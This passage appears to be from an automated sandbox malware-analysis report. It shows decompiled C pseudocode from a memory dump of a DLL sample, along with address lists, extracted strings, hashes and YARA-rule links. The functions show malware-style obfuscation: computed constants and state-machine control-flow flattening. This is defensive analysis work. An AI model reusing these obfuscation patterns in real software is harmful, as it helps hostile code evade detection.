				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				char _v616;
				void* _t242;
				void* _t243;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				intOrPtr _t285;

				_v52 = 0xa5be;
				_t251 = 0x16;
				_v52 = _v52 / _t251;
				_v52 = _v52 >> 0xc;
				_v52 = _v52 ^ 0x0005c33b;
				_v48 = 0xc42d20;
				_v48 = _v48 >> 0xd;
				_v48 = _v48 + 0xffffc4d0;
				_v48 = _v48 ^ 0xfffeda29;
				_v72 = 0x4321a7;
				_v72 = _v72 | 0xa4ce3c40;
				_v72 = _v72 ^ 0xa4cab40f;
				_v24 = 0x227e38;
				_t25 =  &_v24; // 0x227e38
				_t252 = 0x2c;
				_v24 =  *_t25 * 0x3c;
				_t27 =  &_v24; // 0x227e38
				_v24 =  *_t27 * 0x66;
				_t29 =  &_v24; // 0x227e38
				_v24 =  *_t29 / _t252;
				_v24 = _v24 ^ 0x014a285a;
				_v60 = 0xfcfbbc;
				_v60 = _v60 >> 8;
				_v60 = _v60 ^ 0x000d93d1;
				_v96 = 0xf80007;
				_v96 = _v96 + 0xaa36;
				_v96 = _v96 ^ 0x00fda443;
				_v80 = 0x5511cc;
				_v80 = _v80 >> 6;
				_v80 = _v80 ^ 0x00043fa8;
				_v88 = 0xbb6e3f;
				_v88 = _v88 + 0xffffbcf0;
				_v88 = _v88 ^ 0x00b4c382;
				_v8 = 0x49da65;
				_v8 = _v8 >> 3;
				_v8 = _v8 >> 7;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 ^ 0x0002f4aa;
				_v16 = 0xc843f1;
				_t253 = 0x50;
				_v16 = _v16 / _t253;
				_v16 = _v16 ^ 0x9e242cdc;
				_v16 = _v16 + 0xffff9a81;
				_v16 = _v16 ^ 0x9e230a73;
				_v36 = 0x2e6bc5;
				_v36 = _v36 | 0x2558a4e0;
				_v36 = _v36 + 0xfffff4e9;
				_v36 = _v36 ^ 0x257724e9;
				_v12 = 0x80a3b9;
				_t254 = 0x6f;
				_v12 = _v12 * 0x79;
				_v12 = _v12 + 0xffff3c67;
				_v12 = _v12 | 0xeef82a75;
				_v12 = _v12 ^ 0xfef88c24;
				_v68 = 0x7db499;
				_v68 = _v68 + 0xffff3f49;
				_v68 = _v68 ^ 0x007e0dc2;
				_v44 = 0x9f49e4;
				_v44 = _v44 << 0xd;
				_v44 = _v44 ^ 0x1368a87d;
				_v44 = _v44 ^ 0xfa51dcf6;
				_v64 = 0x98f463;
				_v64 = _v64 / _t254;
				_v64 = _v64 ^ 0x0008fd0c;
				_v76 = 0x12aedd;
				_v76 = _v76 + 0xf7e7;
				_v76 = _v76 ^ 0x001c1bc6;
				_v28 = 0x4e33bd;
				_t255 = 3;
				_v28 = _v28 / _t255;
				_t256 = 0x48;
				_v28 = _v28 / _t256;
				_t257 = 0x1b;
				_v28 = _v28 * 0x5d;
				_v28 = _v28 ^ 0x002c0e7b;
				_v20 = 0x6739f6;
				_v20 = _v20 * 0x51;
				_v20 = _v20 + 0x822b;
				_v20 = _v20 + 0xffff6302;
				_v20 = _v20 ^ 0x20a7052c;
				_v40 = 0xf776a1;
				_v40 = _v40 | 0xfaf9a8ad;
				_v40 = _v40 + 0xffffa6b3;
				_v40 = _v40 ^ 0xfaf95b8b;
				_v56 = 0xfd0dae;
				_v56 = _v56 / _t257;
				_t258 = 0x23;
				_v56 = _v56 / _t258;
				_v56 = _v56 ^ 0x000358d4;
				_v32 = 0xe62709;
				_v32 = _v32 + 0xffff3f09;
				_v32 = _v32 >> 8;
				_v32 = _v32 ^ 0x0009f673;
				_v92 = 0xdc059c;
				_v92 = _v92 << 4;
				_v92 = _v92 ^ 0x0dc87abe;
				_v84 = 0xab2272;
				_t259 = 0xb;
				_v84 = _v84 / _t259;
				_v84 = _v84 ^ 0x0001c613;
				_t285 =  *0x886214; // 0x0
				_t242 = E008709DD(_v52, _t285 + 0x23c, _v48, _v72);
				_t293 = _a4 + 0x2c;
				_t243 = E0088061D(_v24, _a4 + 0x2c, _t242, _v60, _v96);
				_t302 = _t243;
				if(_t243 != 0) {
					_push(_v16);
					_push(_v8);
					_push(_v88);
					E00882D0A(_v12, _t302, _t293, _v68, _v44, _v64, _a8,  &_v616,  *((intOrPtr*)(_a8 + 0x3c)), E0087E1F8(0x861000, _v80, _t302));
					E0087FECB(_t246, _v76, _v28, _v20, _v40);
					E0086D061( &_v616, _v56, _v32, _v92, _v84);
				}
				return 1;
			}

0x0087bf06
0x0087bf15
0x0087bf1a
0x0087bf1f
0x0087bf23
0x0087bf2a
0x0087bf31
0x0087bf35
0x0087bf3c
0x0087bf43
0x0087bf4a
0x0087bf51
0x0087bf58
0x0087bf5f
0x0087bf63
0x0087bf66
0x0087bf69
0x0087bf6d
0x0087bf70
0x0087bf77
0x0087bf7a
0x0087bf81
0x0087bf88
0x0087bf8c
0x0087bf93
0x0087bf9a
0x0087bfa1
0x0087bfa8
0x0087bfaf
0x0087bfb3
0x0087bfba
0x0087bfc1
0x0087bfc8
0x0087bfcf
0x0087bfd6
0x0087bfda
0x0087bfde
0x0087bfe2
0x0087bfe9
0x0087bff3
0x0087bff8
0x0087bffd
0x0087c004
0x0087c00b
0x0087c012
0x0087c019
0x0087c020
0x0087c027
0x0087c02e
0x0087c039
0x0087c03a
0x0087c03d
0x0087c044
0x0087c04b
0x0087c052
0x0087c059
0x0087c060
0x0087c067
0x0087c06e
0x0087c072
0x0087c079
0x0087c080
0x0087c08c
0x0087c08f
0x0087c096
0x0087c09f
0x0087c0a6
0x0087c0ad
0x0087c0b9
0x0087c0be
0x0087c0c6
0x0087c0cb
0x0087c0d4
0x0087c0d7
0x0087c0da
0x0087c0e1
0x0087c0ec
0x0087c0ef
0x0087c0f6
0x0087c0fd
0x0087c104
0x0087c10b
0x0087c112
0x0087c119
0x0087c120
0x0087c12e
0x0087c134
0x0087c139
0x0087c13e
0x0087c145
0x0087c14c
0x0087c153
0x0087c157
0x0087c15e
0x0087c165
0x0087c169
0x0087c170
0x0087c17a
0x0087c17d
0x0087c180
0x0087c18d
0x0087c19c
0x0087c1ad
0x0087c1b3
0x0087c1bb
0x0087c1bd
0x0087c1c0
0x0087c1c8
0x0087c1cb
0x0087c1fa
0x0087c20d
0x0087c224
0x0087c22c
0x0087c234

Strings

', xrefs: 0087C145
$w%, xrefs: 0087C027
8~", xrefs: 0087BF5F

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: '$8~"$$w%
API String ID: 1586166983-1780403920
Opcode ID: b880a594d56203dbb63728107b52dace6652c89407a58e1e465ca3c53220e930
Instruction ID: a59c7e77e7a1e6009bf8bbf30f322a3a65e4101b6423d849ea406eb890575f2e
Opcode Fuzzy Hash: b880a594d56203dbb63728107b52dace6652c89407a58e1e465ca3c53220e930
Instruction Fuzzy Hash: 6BA12071D0020DEBDF18CFE5D98A9DEBBB2FB44314F208059E511BA264D7B41A5ACF90

Uniqueness

Uniqueness Score: -1.00%

Function 0087D8DB, Relevance: 3.9, Strings: 3, Instructions: 157
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E0087D8DB(signed int __ecx, signed int* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				unsigned int _v76;
				signed int _v80;
				signed int _v84;
				unsigned int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				void* _t128;
				signed int _t142;
				signed int _t153;
				signed int _t155;
				signed int* _t163;
				void* _t164;
				signed int* _t167;

				_push(_a8);
				_t163 = __edx;
				_t153 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0087FE29(_t128);
				_v104 = 0xcf676c;
				_t167 =  &(( &_v116)[4]);
				_v104 = _v104 + 0xb3f2;
				_v104 = _v104 | 0x988d6f24;
				_t164 = 0x3ef4407;
				_v104 = _v104 << 0xf;
				_v104 = _v104 ^ 0xbfbf0000;
				_v68 = 0xc42241;
				_v68 = _v68 + 0x399a;
				_v68 = _v68 ^ 0x00ce5291;
				_v88 = 0x75dd03;
				_v88 = _v88 + 0x7dba;
				_v88 = _v88 >> 6;
				_v88 = _v88 ^ 0x0008d458;
				_v72 = 0x2f46be;
				_v72 = _v72 + 0xffffdb55;
				_v72 = _v72 ^ 0x002db90e;
				_v76 = 0x23e806;
				_v76 = _v76 >> 0x10;
				_v76 = _v76 ^ 0x000f8af6;
				_v116 = 0x607e6d;
				_v116 = _v116 << 0x10;
				_v116 = _v116 + 0xffff6686;
				_v116 = _v116 | 0x3d181bb2;
				_v116 = _v116 ^ 0x7f71bdaf;
				_v96 = 0x2cc21a;
				_v96 = _v96 | 0xe9438a5f;
				_t155 = 0x3a;
				_v96 = _v96 * 0x13;
				_v96 = _v96 ^ 0x5347ec85;
				_v108 = 0xb3af1a;
				_v108 = _v108 / _t155;
				_v108 = _v108 + 0x8361;
				_v108 = _v108 | 0x789ced77;
				_v108 = _v108 ^ 0x789572df;
				_v92 = 0x2d2920;
				_v92 = _v92 * 0x2c;
				_v92 = _v92 * 0x1e;
				_v92 = _v92 ^ 0xe8dd3266;
				_v80 = 0xc07fec;
				_v80 = _v80 << 9;
				_v80 = _v80 ^ 0x80fbd8c8;
				_v112 = 0xa84277;
				_v112 = _v112 + 0xffffed27;
				_v112 = _v112 * 0x1b;
				_v112 = _v112 * 0x2c;
				_v112 = _v112 ^ 0x0c742dd9;
				_v64 = 0x297b8a;
				_v64 = _v64 >> 0xf;
				_v64 = _v64 ^ 0x0005dd25;
				_v84 = 0x5c8db2;
				_v84 = _v84 + 0x6b9b;
				_v84 = _v84 + 0x3228;
				_v84 = _v84 ^ 0x0059c37f;
				_v100 = 0xb4d8ec;
				_v100 = _v100 << 1;
				_v100 = _v100 + 0xe9ba;
				_v100 = _v100 | 0x2516dceb;
				_v100 = _v100 ^ 0x257d75fc;
				do {
					while(_t164 != 0x3ef4407) {
						if(_t164 == 0x3f5e611) {
							_push(_t155);
							_push(_t155);
							_t142 = E0086C5D8(_t163[1]);
							_t167 =  &(_t167[3]);
							 *_t163 = _t142;
							__eflags = _t142;
							if(__eflags != 0) {
								_t164 = 0xddf020d;
								continue;
							}
						} else {
							if(_t164 == 0x4994ece) {
								E0087CAD5(_v64, _v84, __eflags, _v100, _t153 + 4,  &_v60);
							} else {
								if(_t164 == 0x4a51775) {
									_t155 = _t153;
									_t163[1] = E00876187(_t155);
									_t164 = 0x3f5e611;
									continue;
								} else {
									if(_t164 == 0x9d156cc) {
										_t155 = _v108;
										E00870A90(_t155, _v92, _v80,  &_v60, _v112,  *_t153);
										_t167 =  &(_t167[4]);
										_t164 = 0x4994ece;
										continue;
									} else {
										if(_t164 != 0xddf020d) {
											goto L13;
										} else {
											_t155 = _t163;
											E008622A6(_t155, _v116,  &_v60, _v96);
											_t167 =  &(_t167[2]);
											_t164 = 0x9d156cc;
											continue;
										}
									}
								}
							}
						}
						L16:
						__eflags =  *_t163;
						_t127 =  *_t163 != 0;
						__eflags = _t127;
						return 0 | _t127;
					}
					_t164 = 0x4a51775;
					 *_t163 =  *_t163 & 0x00000000;
					__eflags =  *_t163;
					_t163[1] = _v104;
					L13:
					__eflags = _t164 - 0xae42d9c;
				} while (__eflags != 0);
				goto L16;
			}

0x0087d8e2
0x0087d8e9
0x0087d8eb
0x0087d8ed
0x0087d8f4
0x0087d8f5
0x0087d8f6
0x0087d8fb
0x0087d903
0x0087d906
0x0087d910
0x0087d918
0x0087d91d
0x0087d927
0x0087d92f
0x0087d937
0x0087d93f
0x0087d947
0x0087d94f
0x0087d957
0x0087d95c
0x0087d964
0x0087d96c
0x0087d974
0x0087d97c
0x0087d984
0x0087d989
0x0087d991
0x0087d999
0x0087d99e
0x0087d9a6
0x0087d9ae
0x0087d9b6
0x0087d9be
0x0087d9cd
0x0087d9ce
0x0087d9d2
0x0087d9da
0x0087d9e8
0x0087d9ec
0x0087d9f4
0x0087d9fc
0x0087da04
0x0087da11
0x0087da1a
0x0087da1e
0x0087da26
0x0087da2e
0x0087da33
0x0087da3b
0x0087da43
0x0087da50
0x0087da59
0x0087da5d
0x0087da65
0x0087da6d
0x0087da72
0x0087da7a
0x0087da82
0x0087da8a
0x0087da92
0x0087da9a
0x0087daa2
0x0087daa6
0x0087daae
0x0087dab6
0x0087dabe
0x0087dabe
0x0087dad0
0x0087db5e
0x0087db5f
0x0087db63
0x0087db68
0x0087db6b
0x0087db6d
0x0087db6f
0x0087db71
0x00000000
0x0087db71
0x0087dad2
0x0087dad8
0x0087dbaa
0x0087dade
0x0087dae4
0x0087db3a
0x0087db41
0x0087db44
0x00000000
0x0087dae6
0x0087daec
0x0087db27
0x0087db2b
0x0087db30
0x0087db33
0x00000000
0x0087daee
0x0087daf0
0x00000000
0x0087daf6
0x0087db03
0x0087db05
0x0087db0a
0x0087db0d
0x00000000
0x0087db0d
0x0087daf0
0x0087daec
0x0087dae4
0x0087dad8
0x0087dbb2
0x0087dbb4
0x0087dbb9
0x0087dbb9
0x0087dbc0
0x0087dbc0
0x0087db7c
0x0087db81
0x0087db81
0x0087db84
0x0087db87
0x0087db87
0x0087db87
0x00000000

Strings

(2, xrefs: 0087DA8A
)-, xrefs: 0087DA04
m~`, xrefs: 0087D991

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: )-$(2$m~`
API String ID: 0-2018184401
Opcode ID: 3e11803ea927e7df6680295804b9090ad11ac98bc0e337558a280692f26d1627
Instruction ID: 7614d271e4356bdf7859322411acd152fee0d5a0e648fd2917be0dda45ecec94
Opcode Fuzzy Hash: 3e11803ea927e7df6680295804b9090ad11ac98bc0e337558a280692f26d1627
Instruction Fuzzy Hash: CB7156B24083419FC354DF29D58545BFBF0FB98358F008A1DF99996224E3B1DA498F83

Uniqueness

Uniqueness Score: -1.00%

Function 00879774, Relevance: 3.9, Strings: 3, Instructions: 149
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E00879774(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a20, intOrPtr _a24) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				void* _t119;
				intOrPtr _t132;
				void* _t134;
				void* _t139;
				signed int _t154;
				signed int _t155;
				signed int _t156;
				void* _t158;
				signed int* _t161;

				_push(_a24);
				_push(_a20);
				_push(1);
				_push(_a12);
				_push(1);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0087FE29(_t119);
				_v16 = 0xc48506;
				_t161 =  &(( &_v52)[8]);
				_v16 = _v16 + 0xffffac5b;
				_v16 = _v16 ^ 0x00c0af73;
				_t158 = 0;
				_v36 = 0x37ec46;
				_t139 = 0x2fa1272;
				_t11 =  &_v36; // 0x37ec46
				_t154 = 0xf;
				_v36 =  *_t11 / _t154;
				_t155 = 0x17;
				_v36 = _v36 * 0x4d;
				_v36 = _v36 ^ 0x011f94eb;
				_v48 = 0x1c9307;
				_v48 = _v48 + 0xffff180a;
				_v48 = _v48 >> 0xc;
				_v48 = _v48 + 0x45e7;
				_v48 = _v48 ^ 0x000c030c;
				_v20 = 0x2c1c35;
				_v20 = _v20 * 0x1a;
				_v20 = _v20 ^ 0x04724ae3;
				_v52 = 0xfea2f7;
				_v52 = _v52 + 0xffffcd03;
				_v52 = _v52 << 0xf;
				_v52 = _v52 >> 4;
				_v52 = _v52 ^ 0x0374764b;
				_v24 = 0x4bca1;
				_v24 = _v24 + 0xffff92f8;
				_v24 = _v24 >> 6;
				_v24 = _v24 ^ 0x0004173d;
				_v28 = 0xca25f8;
				_v28 = _v28 ^ 0xf07fe4f1;
				_v28 = _v28 | 0xda5170b9;
				_v28 = _v28 ^ 0xfaf3c539;
				_v40 = 0x557f86;
				_v40 = _v40 / _t155;
				_v40 = _v40 | 0x36ce95b0;
				_v40 = _v40 + 0xffff3f34;
				_v40 = _v40 ^ 0x36c02d15;
				_v44 = 0x3d6d99;
				_t156 = 0x16;
				_v44 = _v44 * 0x7d;
				_v44 = _v44 >> 0xc;
				_v44 = _v44 << 0xd;
				_v44 = _v44 ^ 0x3bf21f86;
				_v32 = 0x4fb69d;
				_v32 = _v32 << 4;
				_v32 = _v32 / _t156;
				_v32 = _v32 ^ 0x00344331;
				_v8 = 0x9d9959;
				_v8 = _v8 >> 0xe;
				_v8 = _v8 ^ 0x000ae1f8;
				_v12 = 0x98829;
				_v12 = _v12 ^ 0xb9c9dda7;
				_v12 = _v12 ^ 0xb9cd803a;
				_t157 = _v4;
				do {
					while(_t139 != 0x2fa1272) {
						if(_t139 == 0x306b7e5) {
							E0086F9C1(_v4, _v24, _v28, _v40, 1, _a24, 1, _a20, _t139, _v44, _v32);
							_t161 =  &(_t161[9]);
							_t139 = 0xc6d7030;
							_t158 =  !=  ? 1 : _t158;
							continue;
						} else {
							if(_t139 == 0x66d181a) {
								_t132 = E0087BC6B();
								_t157 = _t132;
								if(_t132 != 0xffffffff) {
									_t139 = 0xc4ce558;
									continue;
								}
							} else {
								if(_t139 == 0xc4ce558) {
									_t134 = E008672C4(_v36,  &_v4, _v48, _v20, _t157, _v52);
									_t161 =  &(_t161[4]);
									if(_t134 != 0) {
										_t139 = 0x306b7e5;
										continue;
									}
								} else {
									if(_t139 != 0xc6d7030) {
										goto L14;
									} else {
										E00881538(_v8, _v12, _v4);
									}
								}
							}
						}
						L7:
						return _t158;
					}
					_t139 = 0x66d181a;
					L14:
				} while (_t139 != 0xa576bfc);
				goto L7;
			}

0x0087977b
0x00879781
0x00879786
0x00879787
0x0087978b
0x0087978c
0x00879790
0x00879791
0x00879792
0x00879797
0x0087979f
0x008797a2
0x008797ac
0x008797b4
0x008797b6
0x008797be
0x008797c3
0x008797c9
0x008797ce
0x008797d9
0x008797dc
0x008797e0
0x008797e8
0x008797f0
0x008797f8
0x008797fd
0x00879805
0x0087980d
0x0087981a
0x0087981e
0x00879826
0x0087982e
0x00879836
0x0087983b
0x00879840
0x00879848
0x00879850
0x00879858
0x0087985d
0x00879865
0x0087986d
0x00879875
0x0087987d
0x00879885
0x00879895
0x00879899
0x008798a1
0x008798a9
0x008798b1
0x008798be
0x008798bf
0x008798c3
0x008798c8
0x008798cd
0x008798d5
0x008798dd
0x008798e8
0x008798ec
0x008798f4
0x008798fc
0x00879901
0x00879909
0x00879916
0x0087991e
0x00879926
0x0087992a
0x0087992a
0x00879938
0x008799d4
0x008799d9
0x008799dc
0x008799e3
0x00000000
0x0087993a
0x00879940
0x0087999b
0x008799a0
0x008799a5
0x008799a7
0x00000000
0x008799a7
0x00879942
0x00879948
0x00879987
0x0087998c
0x00879991
0x00879993
0x00000000
0x00879993
0x0087994a
0x00879950
0x00000000
0x00879956
0x00879962
0x00879967
0x00879950
0x00879948
0x00879940
0x00879969
0x00879971
0x00879971
0x008799eb
0x008799f0
0x008799f0
0x00000000

Strings

F7, xrefs: 008797C3
1C4, xrefs: 008798EC
E, xrefs: 008797FD

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: 1C4$F7$E
API String ID: 0-3303878784
Opcode ID: ec422184f0bc8e42d70ac5f52bb51cad38797440f210b574c256831cfc5cf489
Instruction ID: 781dbb5c441560771e4488f0782889a39f315554c29c1df0e4ea140acc52c334
Opcode Fuzzy Hash: ec422184f0bc8e42d70ac5f52bb51cad38797440f210b574c256831cfc5cf489
Instruction Fuzzy Hash: F35173B2109381ABD348CE25D88991FFAE1FBD5748F409A1DF2D696260D370CA49CB83

Uniqueness

Uniqueness Score: -1.00%

Function 0086B820, Relevance: 3.9, Strings: 3, Instructions: 145
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0086B820(void* __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				void* _t158;
				void* _t162;
				signed int _t164;
				signed int _t165;
				signed int _t166;
				signed int _t167;
				signed int _t168;
				signed int _t169;
				intOrPtr _t192;
				intOrPtr* _t193;
				intOrPtr _t194;
				signed int* _t196;

				_t196 =  &_v68;
				_v16 = 0xd87d65;
				_v12 = 0x358b32;
				_v8 = 0xe06945;
				_t192 =  *0x886210; // 0x0
				_v4 = 0;
				_t162 = __ecx;
				_v68 = 0xf23e36;
				_t193 = _t192 + 0x210;
				_v68 = _v68 ^ 0x9abe7b4c;
				_t164 = 0x28;
				_v68 = _v68 / _t164;
				_v68 = _v68 + 0xffff9758;
				_v68 = _v68 ^ 0x03db1914;
				_v28 = 0x153966;
				_v28 = _v28 + 0xc98d;
				_v28 = _v28 ^ 0x00189a49;
				_v32 = 0x66a403;
				_v32 = _v32 + 0x4aa1;
				_v32 = _v32 ^ 0x006148cf;
				_v44 = 0xfe7e73;
				_v44 = _v44 + 0xffff9639;
				_v44 = _v44 | 0x437ec796;
				_v44 = _v44 ^ 0x43f7a292;
				_v48 = 0x44000d;
				_t165 = 0x26;
				_v48 = _v48 / _t165;
				_v48 = _v48 | 0x123d3176;
				_v48 = _v48 ^ 0x1230a07a;
				_v60 = 0x1c671b;
				_v60 = _v60 | 0x089dc1d7;
				_t166 = 0x64;
				_v60 = _v60 / _t166;
				_t167 = 0x5e;
				_v60 = _v60 * 0x62;
				_v60 = _v60 ^ 0x087e3283;
				_v24 = 0x917945;
				_v24 = _v24 ^ 0x5fcd23bd;
				_v24 = _v24 ^ 0x5f54fdfa;
				_v64 = 0xfb1c79;
				_v64 = _v64 ^ 0x3af08dd4;
				_v64 = _v64 + 0x24a6;
				_v64 = _v64 + 0xffffe057;
				_v64 = _v64 ^ 0x3a029534;
				_v36 = 0xae1548;
				_v36 = _v36 * 0x1a;
				_v36 = _v36 + 0x68c6;
				_v36 = _v36 ^ 0x11a48673;
				_v40 = 0xac750c;
				_v40 = _v40 ^ 0x67c11f84;
				_v40 = _v40 | 0x960dc624;
				_v40 = _v40 ^ 0xf7630ea5;
				_v52 = 0x5bbbfa;
				_v52 = _v52 / _t167;
				_v52 = _v52 + 0xc5b0;
				_v52 = _v52 ^ 0x922587b4;
				_v52 = _v52 ^ 0x922f6435;
				_v56 = 0xb91e06;
				_t168 = 0x13;
				_v56 = _v56 / _t168;
				_v56 = _v56 + 0x7f58;
				_v56 = _v56 << 2;
				_v56 = _v56 ^ 0x002d76eb;
				_v20 = 0xce5e52;
				_t169 = 0x56;
				_v20 = _v20 / _t169;
				_v20 = _v20 ^ 0x000b3737;
				while(1) {
					_t194 =  *_t193;
					if(_t194 == 0) {
						break;
					}
					if( *((intOrPtr*)(_t194 + 0x38)) == 0) {
						L4:
						 *_t193 =  *((intOrPtr*)(_t194 + 0x24));
						_t158 = E00882B09(_v52, _t194, _v56, _v20);
					} else {
						_t158 = E00881028(_v28, _v32,  *((intOrPtr*)(_t194 + 0x48)), _t162, _v44, _v48);
						_t196 =  &(_t196[4]);
						if(_t158 != _v68) {
							_t193 = _t194 + 0x24;
						} else {
							 *((intOrPtr*)(_t194 + 0x2c))( *((intOrPtr*)(_t194 + 0x38)), 0, 0);
							E0086F0E9(_v72,  *((intOrPtr*)(_t194 + 0x38)), _v36, _v76);
							E00881538(_v48, _v52,  *((intOrPtr*)(_t194 + 0x48)));
							_t196 =  &(_t196[3]);
							goto L4;
						}
					}
				}
				return _t158;
			}

0x0086b820
0x0086b823
0x0086b82d
0x0086b835
0x0086b841
0x0086b849
0x0086b84d
0x0086b84f
0x0086b857
0x0086b85d
0x0086b86b
0x0086b870
0x0086b876
0x0086b87e
0x0086b886
0x0086b88e
0x0086b896
0x0086b89e
0x0086b8a6
0x0086b8ae
0x0086b8b6
0x0086b8be
0x0086b8c6
0x0086b8ce
0x0086b8d6
0x0086b8e2
0x0086b8e7
0x0086b8ed
0x0086b8f5
0x0086b8fd
0x0086b905
0x0086b911
0x0086b916
0x0086b921
0x0086b922
0x0086b926
0x0086b92e
0x0086b936
0x0086b93e
0x0086b946
0x0086b94e
0x0086b956
0x0086b95e
0x0086b966
0x0086b96e
0x0086b97b
0x0086b97f
0x0086b987
0x0086b98f
0x0086b997
0x0086b99f
0x0086b9a7
0x0086b9af
0x0086b9bd
0x0086b9c1
0x0086b9c9
0x0086b9d1
0x0086b9d9
0x0086b9e9
0x0086b9ee
0x0086b9f4
0x0086b9fc
0x0086ba01
0x0086ba09
0x0086ba15
0x0086ba18
0x0086ba1c
0x0086ba96
0x0086ba96
0x0086ba9a
0x00000000
0x00000000
0x0086ba29
0x0086ba7c
0x0086ba8d
0x0086ba8f
0x0086ba2b
0x0086ba3f
0x0086ba44
0x0086ba4b
0x0086baa4
0x0086ba4d
0x0086ba52
0x0086ba64
0x0086ba74
0x0086ba79
0x00000000
0x0086ba79
0x0086ba4b
0x0086ba29
0x0086baa3

Strings

Ei, xrefs: 0086B835
v-, xrefs: 0086BA01
$P, xrefs: 0086B83F

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: $P$Ei$v-
API String ID: 0-1888193988
Opcode ID: df9f618c4f9e295fa927616ffad993acdc3c56b053752b4827c310a269eb3207
Instruction ID: acc75749a3be530efe7af4fed7a82dc83315cc67a8deda46afddeebff8394517
Opcode Fuzzy Hash: df9f618c4f9e295fa927616ffad993acdc3c56b053752b4827c310a269eb3207
Instruction Fuzzy Hash: CE6134B15083809FD394CF25D48980BBBF1FBC8718F508A1DF196A6260D7B5DA5ACF46

Uniqueness

Uniqueness Score: -1.00%

Function 008807AA, Relevance: 3.9, Strings: 3, Instructions: 145
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E008807AA(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr* _a12) {
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t127;
				void* _t143;
				void* _t147;
				intOrPtr _t159;
				void* _t165;
				signed int _t166;
				signed int _t167;
				signed int _t168;
				signed int _t169;
				signed int* _t172;

				_t145 = _a12;
				_t164 = _a4;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E0087FE29(_t127);
				_v68 = 0xce0704;
				_t172 =  &(( &_v80)[5]);
				_t165 = 0;
				_t147 = 0xeb10c15;
				_push("true");
				_pop(_t166);
				_v68 = _v68 / _t166;
				_v68 = _v68 ^ 0x27d6a24c;
				_v68 = _v68 << 0xd;
				_v68 = _v68 ^ 0x13812000;
				_v56 = 0x3987d6;
				_v56 = _v56 + 0xffffa396;
				_v56 = _v56 << 6;
				_v56 = _v56 + 0xffffda2f;
				_v56 = _v56 ^ 0x0e4ab52f;
				_v76 = 0xda5b69;
				_v76 = _v76 + 0xffffc444;
				_v76 = _v76 >> 3;
				_v76 = _v76 | 0xf293bfd0;
				_v76 = _v76 ^ 0xf29c223d;
				_v80 = 0x3698bd;
				_v80 = _v80 << 2;
				_v80 = _v80 + 0xffffb830;
				_v80 = _v80 | 0x7cee6fd8;
				_v80 = _v80 ^ 0x7cfe3832;
				_v44 = 0x3a6f25;
				_v44 = _v44 >> 3;
				_v44 = _v44 ^ 0x000731a8;
				_v48 = 0xdbe73e;
				_v48 = _v48 | 0x7450ea9d;
				_v48 = _v48 ^ 0x74de2fdf;
				_v36 = 0x16da79;
				_t167 = 0x12;
				_v36 = _v36 * 0x5d;
				_v36 = _v36 ^ 0x084db146;
				_v60 = 0xec6235;
				_v60 = _v60 + 0x184b;
				_v60 = _v60 / _t167;
				_v60 = _v60 | 0x0c30d5fb;
				_v60 = _v60 ^ 0x0c38efee;
